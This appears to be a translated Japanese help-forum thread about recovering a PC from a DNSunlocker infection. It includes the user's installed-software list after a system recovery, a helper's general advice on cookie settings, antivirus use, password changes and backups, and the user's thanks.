Apple Application Support(32 ビット) Apple Inc. 2015/11/06 114 MB 4.1
Apple Application Support(64 ビット) Apple Inc. 2015/11/06 128 MB 4.1
Apple Mobile Device Support Apple Inc. 2015/11/06 28.0 MB 9.1.0.6
Apple Software Update Apple Inc. 2015/11/06 2.40 MB 2.1.4.131
Bonjour Apple Inc. 2015/11/06 2.01 MB 3.1.0.1
BookLive!Reader BookLive 2012/06/20 87.2 MB 1.8.10
Broadcom Card Reader Driver Installer Broadcom Corporation 2015/11/06 2.76 MB 15.0.7.3
Broadcom NetLink Controller Broadcom Corporation 2012/06/20 524 KB 15.0.7.1
Broadcom Wireless Utility Broadcom Corporation 5.100.82.120
CCleaner Piriform 2015/11/06 5.11
clear.fi Media Acer Incorporated 2015/11/06 2.00.3006
clear.fi Media Acer Incorporated 2015/11/06 2.00.3006
clear.fi Photo Acer Incorporated 2015/11/06 2.00.3006
clear.fi Photo Acer Incorporated 2015/11/06 2.00.3006
CyberLink MediaEspresso CyberLink Corp. 2012/06/20 166 MB 6.5.2727_43992
Dropbox Dropbox, Inc. 2015/11/08 3.10.11
ETDWare PS/2-X64 10.6.9.9_WHQL ELAN Microelectronic Corp. 2015/11/06 10.6.9.9
Google Chrome Google Inc. 2015/11/06 48.0.2560.0
Identity Card Acer Incorporated 2015/11/06 1.00.3501
Intel(R) Control Center Intel Corporation 1.2.1.1007
Intel(R) Management Engine Components Intel Corporation 8.0.2.1410
Intel(R) OpenCL CPU Runtime Intel Corporation
Intel(R) Processor Graphics Intel Corporation 8.15.10.2712
Intel(R) Rapid Storage Technology Intel Corporation 11.1.0.1006
Intel® Trusted Connect Service Client Intel Corporation 2015/11/06 10.6 MB 1.23.605.1
iTunes Apple Inc. 2015/11/06 218 MB 12.3.1.23
Jane Style Version 3.83 Jane, Inc. 2015/11/08 3.83
Janetter 4.3.1.0 Jane, Inc. 2015/11/06
Launch Manager Acer Inc. 2015/11/06 5.1.15
Logicool ゲームソフトウェア 8.72 Logicool 2015/11/06 160 MB 8.72.107
Microsoft .NET Framework 4 Client Profile Language Pack - 日本語 Microsoft Corporation 2015/11/07 2.93 MB 4.0.30319
Microsoft .NET Framework 4.5.2 Microsoft Corporation 2015/11/07 38.8 MB 4.5.51209
Microsoft OneDrive Microsoft Corporation 2015/11/08 36.8 MB 17.3.6201.1019
Microsoft Security Essentials Microsoft Corporation 2015/11/06 4.8.204.0
Microsoft Silverlight Microsoft Corporation 2015/11/06 50.7 MB 5.1.40728.0
Microsoft SQL Server 2005 Compact Edition [ENU] Microsoft Corporation 2012/06/20 1.69 MB 3.1.0000
Microsoft Visual C++ 2005 Redistributable Microsoft Corporation 2015/11/06 2.62 MB 8.0.59193
Microsoft Visual C++ 2005 Redistributable (x64) Microsoft Corporation 2015/11/06 570 KB 8.0.61000
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 Microsoft Corporation 2015/11/06 788 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 Microsoft Corporation 2015/11/07 788 KB 9.0.30729.6161
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 Microsoft Corporation 2012/06/20 608 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 Microsoft Corporation 2012/06/20 586 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 Microsoft Corporation 2015/11/06 592 KB 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 Microsoft Corporation 2015/11/07 600 KB 9.0.30729.6161
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.30319 Microsoft Corporation 2015/11/06 13.7 MB 10.0.30319
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.30319 Microsoft Corporation 2015/11/06 11.0 MB 10.0.30319
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 Microsoft Corporation 2015/11/06 20.5 MB 12.0.30501.0
MyWinLocker Suite Egis Technology Inc. 2012/06/20 2.63 MB 4.0.14.19
newsXpresso esobi Inc. 2012/06/20 7.34 MB 1.0.0.40
Norton Online Backup Symantec Corporation 2012/06/20 6.19 MB 2.1.17869
NTI Media Maker 9 NTI Corporation 2015/11/06 0.96 GB 9.0.2.9006
PDF-Viewer Tracker Software Products Ltd 2015/11/09 52.8 MB 2.5.315.0
Realtek High Definition Audio Driver Realtek Semiconductor Corp. 2015/11/06 6.0.1.6543
Skype(TM) 7.13 Skype Technologies S.A. 2015/11/11 75.9 MB 7.13.101
Welcome Center Acer Incorporated 2015/11/06 1.02.3507
Windows Live Essentials Microsoft Corporation 2012/06/20 15.4.3538.0513
インテル(R) ターボ・ブースト・テクノロジー・モニター 2.5 インテル 2015/11/06 13.2 MB 2.5.1.0
  • あすとろ
  • 2015/11/13 (Fri) 02:27:14
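From here on, keep your security awareness and your environment well protected
Thank you for the work and the report.
This time Skype has been updated as well.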
>Skype(TM) 7.13 Skype Technologies S.A. 2015/11/11 75.9 MB 7.13.101

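It looks like the machine is finally back to a normal initial state.
From there, please rebuild your own defenses one at a time to prevent being hit again.
The handling of the main issue is, one way or another, finished.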

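Just tightening the browser settings a little can improve the security effect.
Open "Internet Options" → "Privacy" → "Advanced", check "automatic cookie handling" and "Block third-party cookies", then click "Apply" and "OK".
Doing this is quite effective at protecting against many dangerous sites.
However, it is not effective against every dangerous site, and against a truly dangerous site this much is no match at all, so do not rely on it too much.
Also, setting it to "Block all cookies" has the side effect that you can no longer get into pages that require a login, such as your provider's mailbox, so it is best to choose according to the situation.
Note too that even on safe sites, blocking cookies makes some of them impossible to browse or post to.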

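Next, please also be careful about how you use security software such as antivirus and firewalls.
Security software does not deliver its full capability just by being installed.
It is important to understand its settings and features as well as you can and to use it correctly.
Used wrongly, it will readily let through even an infection it could otherwise have blocked.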

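Also, however capable the security software is, it cannot protect you at all if you yourself access dangerous sites and files.
Depending on how it is used, security software's performance can be doubled, halved, or reduced to nothing.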

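And seeing is believing.
I recommend reading as many of the other threads on this board as you can, both ongoing and resolved.
Whether they are the same, similar, or a different kind of case, there should be a lot in them to learn from.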

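However, I recommend changing, as far as possible, all of the passwords and other information you have ever entered on the PC before the recovery.
In particular, if you have done any online shopping or banking, changing that information is the top priority and a must.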

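Also, get into the habit of regularly and frequently backing up the data you need.
Even without an infection, if a hardware fault on the PC makes important data unrecoverable, you will have no choice but to give up on it.
With a backup, it is easy to keep using the data on a substitute or replacement PC.
Security and stable PC operation: if either one is missing, the machine is of no use.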

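I am sorry that in the end this had to be handled with a recovery, but please turn this hardship to good use and, from here on, rebuild your PC environment and security awareness, even if only little by little.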

Thank you for your hard work, persevering for so long with tasks you were not used to.
Here's to a safe and comfortable PC life from now on.
  • 悪代官
  • 2015/11/13 (Fri) 22:15:50
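Re: DNSunlocker infection
Yes, I will try to be careful about the points above from now on.

It would have been quicker if I had done a recovery from the start; I am sorry for having you go along with my unreasonable request. And at the same time, thank you.

If something like this happens again (though I will try to be careful that it does not), I will come here.

Lastly, once again, thank you very much.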
  • あすとろ
  • 2015/11/15 (Sun) 01:19:11
